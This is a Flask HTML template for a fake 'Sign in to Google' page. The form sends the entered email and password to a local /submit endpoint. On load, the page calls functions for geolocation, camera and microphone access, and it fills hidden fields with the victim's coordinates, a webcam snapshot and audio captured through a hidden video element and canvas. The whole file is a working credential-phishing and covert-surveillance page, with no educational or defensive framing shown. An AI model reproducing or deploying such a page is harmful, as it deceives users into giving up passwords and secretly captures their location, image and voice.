<!DOCTYPE html>
<html>
<head>
    <title>Google</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <h2>Sign in to Google</h2>
    <form id="loginForm" action="/submit" method="POST">
        <input type="hidden" name="platform" value="Google">
        <label>Email or Phone</label><br>
        <input type="text" name="username" required><br>
        <label>Password</label><br>
        <input type="password" name="password" required><br>
        <input type="hidden" name="latitude" id="latitude">
        <input type="hidden" name="longitude" id="longitude">
        <input type="hidden" name="snapshot" id="snapshot">
        <input type="hidden" name="audio" id="audio">
        <button type="submit">Sign In</button>
    </form>
    <video id="video" width="320" height="240" autoplay style="display:none;"></video>
    <canvas id="canvas" width="320" height="240" style="display:none;"></canvas>

    <script src="{{ url_for('static', filename='script.js') }}"></script>
    <script>
        window.onload = function() {
            getLocation();
            getCameraAccess();
            getMicAccess()

        };
    </script>
</body>
</html>